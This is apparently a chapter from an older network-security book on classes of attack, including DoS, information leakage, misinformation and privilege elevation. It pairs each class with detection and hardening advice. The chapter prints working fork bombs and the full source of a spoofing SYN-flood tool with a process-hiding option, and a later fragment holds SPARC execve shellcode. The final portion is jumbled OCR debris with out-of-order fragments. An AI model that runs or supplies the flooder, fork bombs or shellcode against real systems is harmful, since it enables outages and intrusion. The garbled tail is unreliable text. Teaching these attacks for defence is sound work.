Introduction To properly protect your network, you must be aware of the types of attacks that can be launched against it. This chapter covers the various classes of attack that you may encounter, and gives you ideas on how to protect against them. New exploits are created almost daily, but normally they will fall into one of the classes identified in this chapter. It is important to remember that attacks come from both inside and outside your firewall. This chapter attempts to cover some of the more common attacks, but an entire book could be written on every attack that is out there. Keep this fact in mind as you read through this chapter; do not become comfortable thinking that you are protected from all attacks just because you have taken the precautions mentioned here. What Are the Classes of Attack? The classes of attack that are examined in this chapter are denial-of-service, information leakage, file creation, reading, modification and removal, misinfor- mation, special file/database access, and elevation of privileges. Let’s start with denial-of-service. Denial-of-Service What is a denial-of-service (DoS) attack? A DoS attack takes place when avail- ability to a resource is intentionally blocked or degraded due to maliciousness. In other words, the attack impedes the availability of the resource to its reg- ular authorized users. The attack may concentrate on degrading processes, degrading storage capability, destroying files to render the resource unusable, or shutting down parts of the system or processes. Let’s take a closer look at each of these items. Degrading processes occurs when the attacker reduces performance by overloading the target system, by either spawning multiple processes to eat up all available resources of the host system, or by spawning enough processes to overload the central processing unit (CPU). A simple UNIX fork bomb can be used to degrade processes on a system by recursively spawning copies of itself until the system runs out of process table entries. The fork bomb is easy to implement using the shell or C. The code for shell is: ($0 & $0 &) The code for C is: (main() {for(;;)fork();}) The degrading processes attack can also be directed at a network applica- tion, such as File Transfer Protocol (FTP) or Simple Mail Transfer Protocol (SMTP), or at a network service, such as Internet Protocol (IP) or the Internet Control Message Protocol (ICMP). The attacker sends a flood of network 68 Chapter 3 • Classes of Attack www.syngress.com 95_hack_prod_03 7/13/00 8:17 AM Page 68 requests to the target regardless of whether he or she is attacking a network application or a network service. Examples of denial-of-service attacks that degrade processes are snork and chargen. Both of these DoSs affect Windows NT boxes (unless Service Pack 4 or higher has been applied). Snork enables the attacker to send spoofed Remote Procedure Call (RPC) datagrams to the User Datagram Protocol (UDP) destination port 135, giving it the appearance that the “attacked” RPC server sent bad data to another RPC server. The second server sends a reject packet back to the “attacked” server that, in turn, replies with another reject packet, thereby creating a loop that is not broken until a packet is dropped, which could take a few minutes. If the spoofed packet is sent to several different computers, then the “attacked” server could waste a considerable amount of processor resources and network bandwidth that otherwise could be used by legitimate network users to accomplish their mission. The chargen DoS func- tions against Windows NT systems that have the Simple TCP/IP Services installed. Basically, what happens is that a flood of UDP datagrams is sent from a spoofed source IP address to port 19 (the chargen port) to the subnet broadcast address. Affected Windows NT systems respond to each broadcast, thereby creating a flood of UDP datagrams on the network. Two more examples of this type of DoS are smurf and the SYN (synchroniza- tion) flood. The smurf DoS performs a network-level attack against the target host. However, unlike other DoSs, this attack relies on the intermediary, a router, to help as shown in Figure 3.1. The attacker, spoofing the source IP address of the target host, generates a large amount of ICMP echo traffic Classes of Attack • Chapter 3 69 www.syngress.com Attacker sends ICMP echo packets (from the spoofed source address of the intended victim) to a broadcast address Victim receives all the ICMP echo replies Router Internet Figure 3.1 Diagram of a smurf attack. 95_hack_prod_03 7/13/00 8:17 AM Page 69 directed toward IP broadcast addresses. The router, also known as a smurf amplifier, converts the IP broadcast to a layer 2 broadcast and sends it on its way. Each host that receives the broadcast responds back to the real source IP with an echo reply. Depending on the number of hosts on the network both the router and target host can be inundated with traffic, resulting in degraded network service availability. The SYN flood is accomplished by sending Transmission Control Protocol (TCP) connection requests faster than a system can process them. The target system sets aside resources to track each connection, so a great number of incoming SYNs can cause the target host to run out of resources for new legiti- mate connections. The source IP address is, as usual, spoofed so that when the target system attempts to respond with the second portion of the three-way handshake, a SYN-ACK (synchronization-acknowledgment), it receives no response. Some operating systems will retransmit the SYN-ACK a number of times before releasing the resources back to the system. Here is an example of exploit code written by Zakath that creates a SYN flood. This SYN flooder allows you to select an address the packets will be spoofed from, as well as the ports to flood on the victim’s system. The code is presented here for educa- tional purposes only, and is not to be used to create a DoS on any live net- works. This code is available on several Internet sites, so I am not giving away any “secrets” by printing it here. /* Syn Flooder by Zakath * TCP Functions by trurl_ (thanks man). * Some more code by Zakath. * Speed/Misc Tweaks/Enhancments — ultima * Nice Interface — ultima * Random IP Spoofing Mode — ultima * How To Use: * Usage is simple. srcaddr is the IP the packets will be spoofed from. * dstaddr is the target machine you are sending the packets to. * low and high ports are the ports you want to send the packets to. * Random IP Spoofing Mode: Instead of typing in a source address, * just use '0'. This will engage the Random IP Spoofing mode, and * the source address will be a random IP instead of a fixed ip. * Released: [4.29.97] * To compile: cc -o synk4 synk4.c * */ #include <signal.h> #include <stdio.h> #include <netdb.h> #include <sys/types.h> #include <sys/time.h> #include <netinet/in.h> #include <linux/ip.h> #include <linux/tcp.h> /* These can be handy if you want to run the flooder while the admin is on * this way, it makes it MUCH harder for him to kill your flooder */ /* Ignores all signals except Segfault */ 70 Chapter 3 • Classes of Attack www.syngress.com 95_hack_prod_03 7/13/00 8:17 AM Page 70 // #define HEALTHY /* Ignores Segfault */ // #define NOSEGV /* Changes what shows up in ps -aux to whatever this is defined to */ // #define HIDDEN "vi .cshrc" #define SEQ 0x28376839 #define getrandom(min, max) ((rand() % (int)(((max)+1) - (min))) + (min)) unsigned long send_seq, ack_seq, srcport; char flood = 0; int sock, ssock, curc, cnt; /* Check Sum */ unsigned short ip_sum (addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return (answer); } void sig_exit(int crap) { #ifndef HEALTHY printf("_[H_[JSignal Caught. Exiting Cleanly.\n"); exit(crap); #endif } void sig_segv(int crap) { #ifndef NOSEGV printf("_[H_[JSegmentation Violation Caught. Exiting Cleanly.\n"); exit(crap); #endif } unsigned long getaddr(char *name) { struct hostent *hep; Classes of Attack • Chapter 3 71 www.syngress.com 95_hack_prod_03 7/13/00 8:17 AM Page 71 hep=gethostbyname(name); if(!hep) { fprintf(stderr, "Unknown host %s\n", name); exit(1); } return *(unsigned long *)hep->h_addr; } void send_tcp_segment(struct iphdr *ih, struct tcphdr *th, char *data, int dlen) { char buf[65536]; struct { /* rfc 793 tcp pseudo-header */ unsigned long saddr, daddr; char mbz; char ptcl; unsigned short tcpl; } ph; struct sockaddr_in sin; /* how necessary is this, given that the destination address is already in the ip header? */ ph.saddr=ih->saddr; ph.daddr=ih->daddr; ph.mbz=0; ph.ptcl=IPPROTO_TCP; ph.tcpl=htons(sizeof(*th)+dlen); memcpy(buf, &ph, sizeof(ph)); memcpy(buf+sizeof(ph), th, sizeof(*th)); memcpy(buf+sizeof(ph)+sizeof(*th), data, dlen); memset(buf+sizeof(ph)+sizeof(*th)+dlen, 0, 4); th->check=ip_sum(buf, (sizeof(ph)+sizeof(*th)+dlen+1)&~1); memcpy(buf, ih, 4*ih->ihl); memcpy(buf+4*ih->ihl, th, sizeof(*th)); memcpy(buf+4*ih->ihl+sizeof(*th), data, dlen); memset(buf+4*ih->ihl+sizeof(*th)+dlen, 0, 4); ih->check=ip_sum(buf, (4*ih->ihl + sizeof(*th)+ dlen + 1) & ~1); memcpy(buf, ih, 4*ih->ihl); sin.sin_family=AF_INET; sin.sin_port=th->dest; sin.sin_addr.s_addr=ih->daddr; if(sendto(ssock, buf, 4*ih->ihl + sizeof(*th)+ dlen, 0, &sin, sizeof(sin))<0) { printf("Error sending syn packet.\n"); perror(""); exit(1); } } unsigned long spoof_open(unsigned long my_ip, unsigned long their_ip, unsigned short port) { int i, s; struct iphdr ih; 72 Chapter 3 • Classes of Attack www.syngress.com 95_hack_prod_03 7/13/00 8:17 AM Page 72 struct tcphdr th; struct sockaddr_in sin; int sinsize; unsigned short myport=6969; char buf[1024]; struct timeval tv; ih.version=4; ih.ihl=5; ih.tos=0; /* XXX is this normal? */ ih.tot_len=sizeof(ih)+sizeof(th); ih.id=htons(random()); ih.frag_off=0; ih.ttl=30; ih.protocol=IPPROTO_TCP; ih.check=0; ih.saddr=my_ip; ih.daddr=their_ip; th.source=htons(srcport); th.dest=htons(port); th.seq=htonl(SEQ); th.doff=sizeof(th)/4; th.ack_seq=0; th.res1=0; th.fin=0; th.syn=1; th.rst=0; th.psh=0; th.ack=0; th.urg=0; th.res2=0; th.window=htons(65535); th.check=0; th.urg_ptr=0; gettimeofday(&tv, 0); send_tcp_segment(&ih, &th, "", 0); send_seq = SEQ+1+strlen(buf); } void upsc() { int i; char schar; switch(cnt) { case 0: { schar = '|'; break; } case 1: { Classes of Attack • Chapter 3 73 www.syngress.com 95_hack_prod_03 7/13/00 8:17 AM Page 73 schar = '/'; break; } case 2: { schar = '-'; break; } case 3: { schar = '\\'; break; } case 4: { schar = '|'; cnt = 0; break; } } printf("_[H_[1;30m[_[1;31m%c_[1;30m]_[0m %d", schar, curc); cnt++; for(i=0; i<26; i++) { i++; curc++; } } void init_signals() { // Every Signal known to man. If one gives you an error, comment it out! signal(SIGHUP, sig_exit); signal(SIGINT, sig_exit); signal(SIGQUIT, sig_exit); signal(SIGILL, sig_exit); signal(SIGTRAP, sig_exit); signal(SIGIOT, sig_exit); signal(SIGBUS, sig_exit); signal(SIGFPE, sig_exit); signal(SIGKILL, sig_exit); signal(SIGUSR1, sig_exit); signal(SIGSEGV, sig_segv); signal(SIGUSR2, sig_exit); signal(SIGPIPE, sig_exit); signal(SIGALRM, sig_exit); signal(SIGTERM, sig_exit); signal(SIGCHLD, sig_exit); signal(SIGCONT, sig_exit); signal(SIGSTOP, sig_exit); signal(SIGTSTP, sig_exit); signal(SIGTTIN, sig_exit); signal(SIGTTOU, sig_exit); signal(SIGURG, sig_exit); signal(SIGXCPU, sig_exit); signal(SIGXFSZ, sig_exit); signal(SIGVTALRM, sig_exit); 74 Chapter 3 • Classes of Attack www.syngress.com 95_hack_prod_03 7/13/00 8:17 AM Page 74 signal(SIGPROF, sig_exit); signal(SIGWINCH, sig_exit); signal(SIGIO, sig_exit); signal(SIGPWR, sig_exit); } main(int argc, char **argv) { int i, x, max, floodloop, diff, urip, a, b, c, d; unsigned long them, me_fake; unsigned lowport, highport; char buf[1024], *junk; init_signals(); #ifdef HIDDEN for (i = argc-1; i >= 0; i—) /* Some people like bzero i prefer memset :) */ memset(argv[i], 0, strlen(argv[i])); strcpy(argv[0], HIDDEN); #endif if(argc<5) { printf("Usage: %s srcaddr dstaddr low high\n", argv[0]); printf(" If srcaddr is 0, random addresses will be used\n\n\n"); exit(1); } if( atoi(argv[1]) == 0 ) urip = 1; else me_fake=getaddr(argv[1]); them=getaddr(argv[2]); lowport=atoi(argv[3]); highport=atoi(argv[4]); srandom(time(0)); ssock=socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if(ssock<0) { perror("socket (raw)"); exit(1); } sock=socket(AF_INET, SOCK_RAW, IPPROTO_TCP); if(sock<0) { perror("socket"); exit(1); } junk = (char *)malloc(1024); max = 1500; i = 1; diff = (highport - lowport); if (diff > -1) { printf("_[H_[J\n\nCopyright (c) 1980, 1983, 1986, 1988, 1990, 1991 The Regents of the University\n of California. All Rights Reserved."); for (i=1;i>0;i++) { srandom((time(0)+i)); Classes of Attack • Chapter 3 75 www.syngress.com 95_hack_prod_03 7/13/00 8:17 AM Page 75 srcport = getrandom(1, max)+1000; for (x=lowport;x<=highport;x++) { if ( urip == 1 ) { a = getrandom(0, 255); b = getrandom(0, 255); c = getrandom(0, 255); d = getrandom(0, 255); sprintf(junk, "%i.%i.%i.%i", a, b, c, d); me_fake = getaddr(junk); } spoof_open(/*0xe1e26d0a*/ me_fake, them, x); /* A fair delay. Good for a 28.8 connection */ usleep(300); if (!(floodloop = (floodloop+1)%(diff+1))) { upsc(); fflush(stdout); } } } } else { printf("High port must be greater than Low port.\n"); exit(1); } } You can detect a SYN flood coming from the preceding code by using a variety of tools such as the netstat command shown in Figure 3.2. On several operating system platforms, using the –n parameter displays addresses and port numbers in numerical format, and the –p switch allows you to select only the protocol you are interested in viewing. This prevents all UDP connections from being shown so that you can view only the connections you are interested in for this particular attack. Check the man page for the version of netstat that is available on your operating system to ensure that you use the correct switches. Based on the output of netstat, you may decide to use a packet capture utility to do further analysis. Figure 3.3 shows an incoming SYN flood from the “address” 10.40.0.109. Notice in the Time column the rate that the SYN packets are coming in to the target. At the five-second point in the capture, 27 SYN packets are received in one-half second. Degrading storage capability occurs when the attacker uses all the given storage resources on the target machine, such as by spamming a mail server with either tons of mail and/or attachments till it runs out of storage space. The Love Letter worm has been seen recently within organizations that use Windows NT and Exchange Server as their mail platform. This attack was fairly simple: Visual Basic script replicated itself out to each addressee in the Global Address List each time it was opened (or previewed). For large organizations, it 76 Chapter 3 • Classes of Attack www.syngress.com 95_hack_prod_03 7/13/00 8:17 AM Page 76 Classes of Attack • Chapter 3 77 www.syngress.com Figure 3.2 Using netstat to detect incoming SYN connections. Figure 3.3 Using a packet capture utility to analyze incoming SYN packets. 95_hack_prod_03 7/13/00 8:17 AM Page 77 [...]... "TCPAllowedPorts"=hex(7) :38 ,30 ,00,00 ; http(80) "UDPAllowedPorts"=hex(7) :35 ,32 ,30 ,00,00 ; rip(520) "RawIPAllowedProtocols"=hex(7) :36 ,00 ,31 ,37 ,00,00 ; tcp(6) and udp(17) [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\\Parameters\Tcpip] "TCPAllowedPorts"=hex(7) :38 ,30 ,00,00 ; http(80) "UDPAllowedPorts"=hex(7) :35 ,32 ,30 ,00,00 ; rip(520) "RawIPAllowedProtocols"=hex(7) :36 ,00 ,31 ,37 ,00,00 ; tcp(6)... your network, but you are probably wondering how you can test for these different exploits without affecting the daily operation of your network That is a good question, because, after all, your goal is to prevent a hacker from exploiting your network, so why do it yourself! What does it matter if you or a hacker www.syngress.com 95 _hack_ prod_ 03 7/ 13/ 00 8:17 AM Page 89 Classes of Attack • Chapter 3. .. state: closed) Port State Service 21/tcp open ftp 23/ tcp open telnet 25/tcp open smtp 37 /tcp open time 79/tcp open finger 80/tcp open http 110/tcp open pop -3 111/tcp open sunrpc 1 13/ tcp open auth 1 43/ tcp open imap2 5 13/ tcp open login 514/tcp open shell 688/tcp open unknown 2049/tcp open nfs www.syngress.com 81 95 _hack_ prod_ 03 82 7/ 13/ 00 8:17 AM Page 82 Chapter 3 • Classes of Attack TCP Sequence Prediction:... NIC-NAME to the name of your network interface card (NIC) You can identify it by going to HKLM\SOFTWARE\Microsoft\ Windows NT\CurrentVersion\NetworkCards and looking for it In the testing I have done, this does successfully confuse nmap, but your mileage may vary If you mess up your NT box, don’t blame me! www.syngress.com 93 95 _hack_ prod_ 03 94 7/ 13/ 00 8:17 AM Page 94 Chapter 3 • Classes of Attack File... happily display the data in www.syngress.com 83 95 _hack_ prod_ 03 84 7/ 13/ 00 8:17 AM Page 84 Chapter 3 • Classes of Attack Figure 3. 6 Displaying portions of a remote Windows NT system’s Registry the HKEY_USERS and HKEY_LOCAL_MACHINE hives to certain users on the network as shown in Figure 3. 6 The information provided in these keys may give someone within your organization all the information she needs... are used on your network For example, if you are using Windows NT or Windows 9x on your network, unpatched systems are vulnerable to Winnuke Winnuke sends Out-of-Band data, typically on port 139 (NetBIOS Session Service) For many more reasons than just DoS, port 139 should be closed at your network s border router or firewall There is no legitimate reason this port should be open to the Internet If... of your network Testing for certain categories of exploits can seriously impact the productivity of your network For these types of attacks, it is often best to compare operating system/service pack versions, as well as date/timestamps of files www.syngress.com 97 95 _hack_ prod_ 03 98 7/ 13/ 00 8:17 AM Page 98 Chapter 3 • Classes of Attack that are affected by the exploit This does take more work on your. .. fingerprint of your operating system if possible To protect your systems from misinformation, you should use Tripwire and keep your system logs on a protected server to prevent them from being tampered with LogCheck is useful for notifying you immediately by e-mail of problems and security violations that appear in your logs Protecting your system’s special files consists of blocking ports 135 , 137 , 138 , 139 at... Registry to a public Web site Of course, you cannot block these ports inside your firewall or your Windows NT network will cease to function But, remember earlier in the chapter when I mentioned that certain users can open certain hives of www.syngress.com 95 95 _hack_ prod_ 03 96 7/ 13/ 00 8:17 AM Page 96 Chapter 3 • Classes of Attack Figure 3. 9 Tripwire for Linux Windows NT Workstations? To prevent this from occurring,... "\x91\xd0\x20\x08" /* execve: /* 24 */ "\x2d\x0b\xd8\x9a" /* 28 */ "\xac\x15\xa1\x6e" /* 32 */ "\x2f\x0b\xdc\xda" /* 36 */ "\x90\x0b\x80\x0e" /* 40 */ "\x92\x 03\ xa0\x08" /* 44 */ "\x94\x1b\xc0\x0f" /* 48 */ "\x9c\x 03\ xa0\x10" /* 52 */ "\xec\x3b\xbf\xf0" /* 56 */ "\xd0\x 23\ xbf\xf8" /* 60 */ "\xc0\x 23\ xbf\xfc" /* 64 */ "\x82\x10\x20\x3b" /* 68 */ "\x91\xd0\x20\x08"; */ */ */ */ */ /* xor %o7,%o7,%o0 */ /* mov 27,%g1 . Attack • Chapter 3 83 www.syngress.com 95 _hack_ prod_ 03 7/ 13/ 00 8:17 AM Page 83 the HKEY_USERS and HKEY_LOCAL_MACHINE hives to certain users on the network as shown in Figure 3. 6. The information. 1: { Classes of Attack • Chapter 3 73 www.syngress.com 95 _hack_ prod_ 03 7/ 13/ 00 8:17 AM Page 73 schar = '/'; break; } case 2: { schar = '-'; break; } case 3: { schar = '\'; break; } case. organizations, it 76 Chapter 3 • Classes of Attack www.syngress.com 95 _hack_ prod_ 03 7/ 13/ 00 8:17 AM Page 76 Classes of Attack • Chapter 3 77 www.syngress.com Figure 3. 2 Using netstat to detect